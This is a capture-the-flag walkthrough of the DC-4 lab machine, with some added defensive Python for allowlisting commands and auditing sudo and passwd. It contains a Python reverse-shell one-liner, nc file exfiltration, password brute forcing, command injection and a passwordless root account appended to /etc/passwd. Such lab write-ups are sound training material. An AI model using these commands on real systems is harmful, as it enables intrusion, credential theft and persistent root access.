Information gathering

  • First, check the Kali IP address:
root at kali in ~/DC4 
$ ip --color address
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:36:e9:5d brd ff:ff:ff:ff:ff:ff
inet 10.10.8.17/24 brd 10.10.8.255 scope global dynamic noprefixroute eth0
valid_lft 1418sec preferred_lft 1418sec
inet6 fe80::fff8:80c4:4cdf:a014/64 scope link noprefixroute
valid_lft forever preferred_lft forever

Host discovery

  • An Nmap scan turns up one IP: 10.10.8.23
root at kali in ~/DC4 
$ nmap -sn -T4 --min-rate 10000 10.10.8.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:03 CST
Nmap scan report for 10.10.8.1
Host is up (0.00010s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.8.2
Host is up (0.000045s latency).
MAC Address: 00:50:56:EA:61:D3 (VMware)
Nmap scan report for 10.10.8.23
Host is up (0.000060s latency).
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Nmap scan report for 10.10.8.254
Host is up (0.000052s latency).
MAC Address: 00:50:56:FF:CC:3E (VMware)
Nmap scan report for 10.10.8.17
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.41 seconds

Port scan

  • Scan for open ports:
root at kali in ~/DC4 
$ nmap -p- -sT -T4 --min-rate 10000 10.10.8.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:04 CST
Nmap scan report for 10.10.8.23
Host is up (0.00057s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds

Service identification

  • Identify the services behind the open ports:
root at kali in ~/DC4 
$ nmap -p22,80 -sV -O -sT -T4 --min-rate 10000 10.10.8.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:05 CST
Nmap scan report for 10.10.8.23
Host is up (0.00051s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open http nginx 1.15.10
MAC Address: 00:0C:29:2B:59:D5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.64 seconds

Vulnerability scan

  • Run an Nmap vulnerability scan:
root at kali in ~/DC4 
$ nmap -p22,80 --script=vuln -T4 --min-rate 10000 10.10.8.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-06-24 21:05 CST
Nmap scan report for 10.10.8.23
Host is up (0.00040s latency).

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.8.23
| Found the following possible CSRF vulnerabilities:
|
| Path: http://10.10.8.23:80/
| Form id:
| Form action: login.php
|
| Path: http://10.10.8.23:80/login.php
| Form id:
|_ Form action: login.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 00:0C:29:2B:59:D5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.05 seconds
  • None of the findings reported by the scan is useful.

Directory scan

root at kali in ~/DC4 
$ dirsearch -u http://10.10.8.23 -o $PWD/dirsearch.txt

_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/DC4/dirsearch.txt

Target: http://10.10.8.23/

[21:06:04] Starting:
[21:06:12] 302 - 704B - /command.php -> index.php
[21:06:13] 301 - 170B - /css -> http://10.10.8.23/css/
[21:06:15] 301 - 170B - /images -> http://10.10.8.23/images/
[21:06:15] 403 - 556B - /images/
[21:06:16] 403 - 15B - /index.pHp
[21:06:17] 302 - 206B - /login.php -> index.php
[21:06:17] 302 - 163B - /logout.php -> index.php

Task Completed

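Exploitation

  • SSH brute force is usually not the first thing to try, so open port 80 in a browser.

  • This is clearly a custom-built site. Judging by the directory scan results, the login form is the only thing that can be attacked.
  • The login form may have the following problems:
    • SQL injection / universal password
    • Weak credentials / brute force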

SQL injection (failed)

  • Enter admin/123456 and capture the request with BurpSuite.

  • Save the request to a file and test it with SQLMap:
root at kali in ~/DC4 
$ sqlmap -r url.txt -v 0
___
__H__
___ ___[(]_____ ___ ___ {1.7.8#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 21:12:04 /2024-06-24/

got a 302 redirect to 'http://10.10.8.23/index.php'. Do you want to follow? [Y/n] n
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=sli0tvaljvb...5dp3flr0n3'). Do you want to use those [Y/n] n
[21:12:08] [WARNING] time-based comparison requires larger statistical model, please wait. (done)
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[21:12:09] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'

[*] ending @ 21:12:09 /2024-06-24/
  • No SQL injection was found.

Brute force

  • Since SQL injection failed, try brute force. Take the same BurpSuite request and send it to the Intruder module.

  • The page itself carries a hint, which suggests the account is probably admin.

  • So selecting only the password position is enough.

  • Load a wordlist. rockyou.txt was not chosen because it is simply too large.

  • The brute force shows that the password of the admin user is happy.

RCE

  • Log in.

  • There is a Command button; click it to see what it does.

  • Three commands can be run:
    • List Files
    • Disk Usage
    • Disk Free
  • Try Run.

  • The target executes ls -l. Capture the request to check whether the command is passed from the front end to the back end.

  • The command is indeed sent by the front end and executed by the back end, so modify the radio value directly and try to get a reverse shell.
  • Check whether the NC command exists: ls -l /bin | grep nc
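
The root cause shown above is that the back end executes whatever text the radio field carries. The added example below (not from the original write-up, and in Python rather than the target's PHP) sketches the server-side fix: the request carries only a key, the argv comes from a fixed table, and rejected values are logged. The key names, the du/df arguments and the handler and log shapes are assumptions.

```python
import subprocess

# Server-side table: the request carries only a key, the argv lives here.
# "ls -l" is the command the page shows; the key names and the du/df
# argv are assumptions of this example.
ALLOWED = {
    "list_files": ["ls", "-l"],
    "disk_usage": ["du", "-sh", "."],
    "disk_free": ["df", "-h"],
}


def resolve_command(radio):
    """Map the posted value to a fixed argv; anything else is rejected."""
    if not isinstance(radio, str) or radio not in ALLOWED:
        raise ValueError("unknown command key: %r" % (radio,))
    return list(ALLOWED[radio])


def handle_command_post(form, user, audit_log):
    """Return (http_status, body) for one POST to the command page."""
    radio = form.get("radio", "")
    try:
        argv = resolve_command(radio)
    except ValueError:
        # A value outside the table means the request was edited after it
        # left the form; record it so repeated attempts can be alerted on.
        audit_log.append(
            {"event": "rejected_command", "user": user, "value": radio}
        )
        return 400, "unknown command"
    # argv list and no shell: metacharacters in input are never interpreted.
    done = subprocess.run(
        argv, capture_output=True, text=True, timeout=5, check=False
    )
    status = 200 if done.returncode == 0 else 500
    return status, done.stdout


if __name__ == "__main__":
    log = []
    # Constructed requests: one legitimate key, one edited value.
    print(handle_command_post({"radio": "list_files"}, "admin", log)[0])
    print(handle_command_post({"radio": "ls -l; id"}, "admin", log))
    print(log)
```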

Reverse shell

  • The target has nc.traditional, the GNU version of NC, which supports the -e option:
root at kali in ~/DC4 
$ nc -lvvp 4444
listening on [any] 4444 ...
10.10.8.23: inverse host lookup failed: Unknown host
connect to [10.10.8.17] from (UNKNOWN) [10.10.8.23] 35938
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

  • A Python reverse shell works as well:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.8.17",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
  • The current shell is not interactive enough, so upgrade it:
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@dc-4:/usr/share/nginx/html$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Host enumeration

  • Time for host enumeration again. Tired of doing it by hand, so use a script:
root at kali in ~/DC4
$ proxychains curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh
  • Upload lse.sh to the target. Start a web server on Kali:
root at kali in ~/DC4 
$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

  • Download it on the target:
www-data@dc-4:/usr/share/nginx/html$ cd /tmp
cd /tmp
www-data@dc-4:/tmp$ wget http://10.10.8.17/lse.sh
wget http://10.10.8.17/lse.sh
--2024-06-24 23:57:37-- http://10.10.8.17/lse.sh
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 55098 (54K) [text/x-sh]
Saving to: 'lse.sh'

lse.sh 100%[===================>] 53.81K --.-KB/s in 0s

2024-06-24 23:57:37 (108 MB/s) - 'lse.sh' saved [55098/55098]
  • Make it executable and run it:
www-data@dc-4:/tmp$ chmod +x lse.sh
chmod +x lse.sh
www-data@dc-4:/tmp$ ./lse.sh
./lse.sh
---
If you know the current user password, write it here to check sudo privileges:
......
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/home/jim/test.sh
---
[!] fst030 Can we write to any setuid binary?.............................. yes!
---
/home/jim/test.sh
......
  • This reveals a test.sh script. View its contents:
#!/bin/bash
for i in {1..5}
do
sleep 1
echo "Learn bash they said."
sleep 1
echo "Bash is good they said."
done
echo "But I'd rather bash my head against a brick wall."
  • No use at all. Try another script:
root at kali in ~/DC4 
$ proxychains git clone https://github.com/rebootuser/LinEnum.git
  • Upload it to the target again:
www-data@dc-4:/tmp$ wget http://10.10.8.17/LinEnum/LinEnum.sh
wget http://10.10.8.17/LinEnum/LinEnum.sh
--2024-06-25 00:05:18-- http://10.10.8.17/LinEnum/LinEnum.sh
Connecting to 10.10.8.17:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: 'LinEnum.sh'

LinEnum.sh 100%[===================>] 45.54K --.-KB/s in 0s

2024-06-25 00:05:18 (866 MB/s) - 'LinEnum.sh' saved [46631/46631]

www-data@dc-4:/tmp$ chmod +x LinEnum.sh
chmod +x LinEnum.sh
  • Run it and review the output:
www-data@dc-4:/tmp$ ./LinEnum.sh
./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue Jun 25 00:06:18 AEST 2024
......
[-] Location and Permissions (if accessible) of .bak file(s):
-rw-r--r-- 1 jim jim 2047 Apr 7 2019 /home/jim/backups/old-passwords.bak
......

Sensitive information disclosure v1

  • An old-passwords.bak file turns up. View its contents:
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
......
  • It looks like a password wordlist, and the user name is jim. Use NC to copy the file over to Kali:
# Run on Kali
root at kali in ~/DC4
$ nc -lp 6666 > passwd.txt

# Run on the target
www-data@dc-4:/tmp$ nc 10.10.8.17 6666 < /home/jim/backups/old-passwords.bak

SSH brute force

  • Brute-force with Hydra:
root at kali in ~/DC4 
$ hydra -l jim -P passwd.txt ssh://10.10.8.23:22
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-06-24 22:19:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://10.10.8.23:22/
[STATUS] 136.00 tries/min, 136 tries in 00:01h, 120 to do in 00:01h, 12 active
[STATUS] 98.00 tries/min, 196 tries in 00:02h, 60 to do in 00:01h, 12 active
[22][ssh] host: 10.10.8.23 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-06-24 22:21:22
  • The password is jibril04. Log in over SSH:
root at kali in ~/DC4 
$ ssh jim@10.10.8.23
The authenticity of host '10.10.8.23 (10.10.8.23)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.8.23' (ED25519) to the list of known hosts.
jim@10.10.8.23's password:
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ id
uid=1002(jim) gid=1002(jim) groups=1002(jim)
  • Login succeeds.

Sensitive information disclosure v2

  • See what is in the current directory:
jim@dc-4:~$ ls -al
total 32
drwxr-xr-x 3 jim jim 4096 Apr 7 2019 .
drwxr-xr-x 5 root root 4096 Apr 7 2019 ..
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw-r--r-- 1 jim jim 220 Apr 6 2019 .bash_logout
-rw-r--r-- 1 jim jim 3526 Apr 6 2019 .bashrc
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rw-r--r-- 1 jim jim 675 Apr 6 2019 .profile
-rwsrwxrwx 1 jim jim 174 Apr 6 2019 test.sh
  • There is an mbox. View its contents:
jim@dc-4:~$ cat mbox
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
(envelope-from <root@dc-4>)
id 1hCiQe-0000gc-EC
for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: RO

This is a test.
  • It is a test e-mail. Since there is mail, check whether the mail directory holds anything else:
jim@dc-4:/var/mail$ ls -al
total 24
drwxrwsr-x 2 root mail 4096 Jun 25 00:06 .
drwxr-xr-x 12 root root 4096 Apr 5 2019 ..
-rw-rw---- 1 jim mail 715 Apr 6 2019 jim
-rw-rw---- 1 www-data mail 8769 Jun 25 00:06 www-data
  • It does. View the contents:
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles
  • This gives the password of the charles user. Switch to it:
jim@dc-4:/var/mail$ su - charles
Password:
charles@dc-4:~$ id
uid=1001(charles) gid=1001(charles) groups=1001(charles)

teehee privilege escalation

  • The privileges are still not enough. Run LinEnum.sh to gather more information:
charles@dc-4:/tmp$ ./LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.982

[-] Debug Info
[+] Thorough tests = Disabled


Scan started at:
Tue 25 Jun 00:28:56 AEST 2024
......
[+] We can sudo without supplying a password!
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
......
  • The teehee command can be run with root privileges without a password. Look it up on the GTFOBins site.

  • It is not listed, which is awkward. Searching for what the teehee command does turns up nothing either.
  • So check what it does on the target itself:
charles@dc-4:/tmp$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit

MODE determines behavior with write errors on the outputs:
'warn' diagnose errors writing to any output
'warn-nopipe' diagnose errors writing to any output not a pipe
'exit' exit on error writing to any output
'exit-nopipe' exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'
  • Roughly, it copies standard input to each file and also to standard output.
  • Test it:
charles@dc-4:/tmp$ echo 'demo' | sudo teehee -a demo.txt
demo
  • It works. Since it can append data, simply append a user to /etc/passwd:
charles@dc-4:/tmp$ head -n 1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
charles@dc-4:/tmp$ echo 'yongz::0:0:root:/root:/bin/bash' | sudo teehee -a /etc/passwd
yongz::0:0:root:/root:/bin/bash
  • Switch user:
charles@dc-4:/tmp$ su yongz
root@dc-4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
  • Privilege escalation succeeded. Find the flag:
root@dc-4:/tmp# cd /root
root@dc-4:~# ls -al
total 28
drwx------ 3 root root 4096 Apr 7 2019 .
drwxr-xr-x 21 root root 4096 Apr 5 2019 ..
-rw------- 1 root root 16 Apr 7 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 976 Apr 6 2019 flag.txt
drwxr-xr-x 2 root root 4096 Apr 6 2019 .nano
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
root@dc-4:~# cat flag.txt



888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888


Congratulations!!!

Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
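
The teehee escalation above works because a NOPASSWD sudo rule for a tee-like binary gives root write access to any file, /etc/passwd included. The added example below (not part of the original write-up) audits both ends of that chain: file-writing binaries in sudo -l output, and extra UID 0 or empty-password entries in a passwd file. The FILE_WRITERS set and the www-data sample line are assumptions; the other sample lines come from the output above.

```python
import re

# Binaries that copy input into a file of the caller's choice. teehee is the
# page's copy of tee; the rest of this set is an assumption, not exhaustive.
FILE_WRITERS = {"tee", "teehee", "dd", "cp", "mv", "sed"}

# Lines 1 and 3 are from the write-up; line 2 is constructed.
PASSWD_SAMPLE = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "yongz::0:0:root:/root:/bin/bash\n"
)
SUDO_SAMPLE = (
    "User charles may run the following commands on dc-4:\n"
    "(root) NOPASSWD: /usr/bin/teehee\n"
)


def audit_passwd(text):
    """Return (line_no, finding, detail) tuples for passwd(5)-format text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, "malformed", line))
            continue
        name, password, uid = fields[0], fields[1], fields[2]
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, "extra-uid0", name))
        if password == "":
            findings.append((lineno, "empty-password", name))
    return findings


def audit_sudo_list(text):
    """Return (run_as, command) for NOPASSWD rules that allow file writes."""
    risky = []
    for match in re.finditer(r"\(([^)]*)\)\s+NOPASSWD:\s*(.+)", text):
        run_as = match.group(1)
        for command in match.group(2).split(","):
            parts = command.split()
            if not parts:
                continue
            binary = parts[0].rsplit("/", 1)[-1]
            if parts[0] == "ALL" or binary in FILE_WRITERS:
                risky.append((run_as, parts[0]))
    return risky


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_SAMPLE):
        print("passwd:", finding)
    for finding in audit_sudo_list(SUDO_SAMPLE):
        print("sudo:", finding)
```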